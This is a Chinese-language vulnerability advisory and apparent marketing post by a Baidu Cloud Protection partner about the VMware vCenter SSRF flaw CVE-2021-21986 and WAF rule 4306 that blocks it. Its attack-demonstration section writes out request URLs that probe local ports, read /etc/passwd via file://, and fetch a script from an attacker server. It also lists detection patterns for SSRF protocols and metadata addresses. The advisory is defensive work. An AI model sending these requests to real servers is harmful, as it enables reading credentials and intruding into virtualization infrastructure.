VMware vCenter Server provider-logo 路径 SSRF 漏洞(CVE-2021-21986):攻击者可通过 url 参数读取任意本地文件,百度云防护规则 4306 已支持拦截

一个影响 VMware vCenter Server 的高危 SSRF 漏洞,潜伏在 provider-logo 路径的 url 参数中。攻击者无需任何身份认证,仅需发送一个包含恶意 url 参数的 HTTP 请求,即可诱使 vCenter Server 访问内网敏感资源、读取任意本地文件,甚至结合其他漏洞进一步拿下服务器。该漏洞虽在 2021 年已被公开,但至今仍有大量企业未完成修复。百度云防护 WAF 内置规则 File_access.CVE-2021-21986.A(规则 ID 4306)可在流量侧精准拦截此类攻击,为企业争取宝贵的修复窗口期。

一、 漏洞核心信息

项目详情
CVE 编号CVE-2021-21986
CVSS v3 评分6.5(中危)
漏洞类型服务器端请求伪造(SSRF) + 任意文件读取
受影响产品VMware vCenter Server(VCSA)
影响版本7.0.x(低于 7.0 U2b)、6.7.x(低于 6.7 U3n)、6.5.x(低于 6.5 U3p),以及 Cloud Foundation 3.x/4.x
攻击条件无需认证、无需用户交互
利用复杂度
官方补丁已发布(VMSA-2021-0010),但大量环境仍未升级

该漏洞与知名的 CVE-2021-21985 远程代码执行漏洞一同被 VMware 在 2021 年 5 月修复,但至今仍有大量 vCenter Server 暴露在公网且未打补丁。

二、 技术原理剖析

2.1 漏洞位置

该漏洞位于 vSphere Client 的 provider-logo 路径,具体 API 路径为:

/ui/vcav-bootstrap/rest/vcav-providers/provider-logo

正常访问时,提示 url 参数不存在。攻击者可通过构造恶意请求,向该接口传递恶意的 url 参数值。

2.2 代码缺陷根源

漏洞源于 h5-vcav-bootstrap-service 组件的 getProviderLogo 函数。该函数通过 URLConnection 读取指定 URL 并返回内容,且未对 url 参数做任何校验

简化的漏洞逻辑如下:

  1. 用户请求 /ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=xxx
  2. vCenter Server 后端直接以 URLConnection 访问 xxx 地址
  3. 将获取到的内容原样返回给攻击者

这意味着:你让 vCenter 访问什么,它就访问什么,并将结果返回给你。

2.3 攻击演示

SSRF 探测:

/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=http://127.0.0.1:8080/

攻击者可利用该漏洞探测 vCenter 服务器可访问的任何内网端口和服务。

任意文件读取:

/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file:///etc/passwd

攻击者可直接读取服务器上的任意本地文件。利用该漏洞甚至可以读取 vCenter 的 postgresql 数据库配置文件,获取关键数据库凭证。

远程文件读取:

/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=http://攻击者服务器/malicious.js

攻击者可诱使 vCenter Server 加载外部恶意脚本,形成 XSS 或进一步渗透。

2.4 认证绕过

研究人员还发现,该 API 接口本身存在认证绕过缺陷。攻击者在未登录的情况下即可直接访问该接口,无需提供任何会话凭证,大幅降低了漏洞利用门槛。

三、 攻击场景与危害

攻击阶段操作危害
信息泄露读取 /etc/passwd、数据库配置文件等本地文件获取系统用户信息、数据库凭证
内网探测向内网 IP 和端口发送 SSRF 请求绘制内网拓扑,定位高价值目标
凭证窃取读取 vCenter 数据库配置文件(vcdb.properties)获取数据库账号密码,进一步控制虚拟化平台
组合漏洞配合 CVE-2021-21985(RCE)或其他上传漏洞直接拿下服务器,控制整个虚拟化集群

VMware 官方曾在安全公告中特别强调:CVE-2021-21985 远程代码执行漏洞非常容易被勒索团伙利用。而 CVE-2021-21986 可作为攻击链的前置信息收集环节,帮助攻击者获取内网拓扑和敏感配置,为后续 RCE 攻击铺平道路。

四、 为什么打了补丁还是防不住?

  • 补丁落地周期长:生产环境升级 vCenter Server 需要停机维护、备份数据、测试兼容性,实际操作常耗时数周甚至数月。
  • 旧版本不再支持:部分企业仍在运行 6.5、6.7 等旧版本,升级到最新版本可能需要整体架构改造。
  • 公网暴露严重:根据 Shodan 扫描数据,仍有大量 vCenter Server 实例直接暴露在公网上,且运行着未打补丁的旧版本。更令人担忧的是,这些暴露的实例中绝大部分运行的是已停止支持的版本,官方不再提供补丁。

结论:仅依赖官方补丁存在巨大的“空窗期”。在网络层部署 WAF 是弥补这一空窗期、保护旧版本系统的最有效手段。

五、 百度云防护 WAF:不打补丁也能拦截攻击

5.1 规则 4306 已上线,开箱即用

根据百度云防护最新内置规则库,针对 CVE-2021-21986 的专项防御规则已上线:

规则名称规则 ID风险等级防护类型更新时间
File_access.CVE-2021-21986.A4306中风险文件读取2026-05-11 18:00:27

该规则描述明确指出:检测 VMware vCenter Server provider-logo 路径 SSRF 漏洞(CVE-2021-21986)利用,通过 url 参数读取本地文件。

接入百度云防护 WAF 后,基础防护引擎默认开启该规则,无需手动配置即可获得保护。

5.2 规则 4306 的检测逻辑

  1. API 路径匹配:检测对 /ui/vcav-bootstrap/rest/vcav-providers/provider-logo 等敏感路径的请求。
  2. url 参数深度解析:解析请求参数中的 url 值,识别其中是否包含:
  • 内网 IP 段(10.0.0.0/8172.16.0.0/12192.168.0.0/16127.0.0.0/8
  • 云元数据地址(169.254.169.254
  • 文件读取协议(file://
  • 特殊协议(gopher://dict://ftp:// 等)
  1. 多层解码防护:无论攻击者对 payload 进行 URL 编码还是双重编码,规则都能自动解码还原,使各种绕过手法全部失效。
  2. 实时拦截:一旦命中规则,直接返回 403 状态码,恶意请求永不抵达 vCenter Server 后端。

5.3 验证规则是否生效

登录百度云防护控制台 → 防护配置Web防护内置规则,搜索规则 ID 4306。确认状态为“开启”,处置动作为“拦截”。若规则状态为“观察”,请手动修改为“拦截”。

5.4 更上一层的通用 SSRF 防护

除了针对 CVE-2021-21986 的专项规则,百度云防护还内置了通用 SSRF 检测规则SSRF.target_protocol.A,规则 ID 4195),专门检测利用高危协议进行 SSRF 的 Web 攻击。该规则可识别 file://gopher://dict://ftp:// 等高风险协议,以及内网地址和云元数据地址的访问行为。即使未来出现未知的 SSRF 变种漏洞,规则 4195 也能起到兜底拦截作用,形成从“专项漏洞防御”到“通用 SSRF 防御”的纵深体系。

六、 企业综合修复建议

优先级措施说明
紧急开启百度云防护 WAF,确认规则 4306 生效立即获得虚拟补丁,阻断攻击流量,无需修改任何代码
升级 vCenter Server 至安全版本升级至 7.0 U2b、6.7 U3n 或 6.5 U3p 及以上版本
限制 API 访问来源 IP在防火墙或负载均衡器中仅允许可信 IP 访问 vCenter Server 的 443 端口
审计历史访问日志检查 /ui/vcav-bootstrap/rest/vcav-providers/provider-logo 接口是否有异常请求记录
禁用不必要的插件若暂时无法升级补丁,可参考 VMware KB 83829 禁用 vSAN 等受影响插件

七、 总结

CVE-2021-21986 是一个典型的“旧洞新用”高危 SSRF 漏洞。由于大量 VMware 虚拟化环境仍未打补丁,它仍然是黑客进行内网探测、窃取敏感配置、配合 RCE 漏洞拿下服务器的重要跳板。百度云防护 WAF 规则 4306(File_access.CVE-2021-21986.A) 在不修改任何代码、不中断业务的前提下,为 vCenter Server 提供了即时可用的“虚拟补丁”。配合通用 SSRF 规则 4195,可形成从专项到通用的纵深防御体系,甚至在官方不再提供补丁的 EOL 版本上也能持续提供保护。

如果你正在使用 VMware vCenter Server 且无法立刻升级,或担心内网资产被 SSRF 攻击穿透,欢迎联系主机吧。我们提供免费安全评估和百度云防护 WAF 接入指导,帮助你在补丁空窗期守住防线。


主机吧 | 百度云防护官方合作伙伴
提供 WAF 接入、高防 CDN、高防 IP、高防服务器、SSL 证书一站式服务
让每一次 SSRF 攻击都无处遁形,让每一台虚拟化服务器都固若金汤。

给TA打赏
共{{data.count}}人
人已打赏
0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧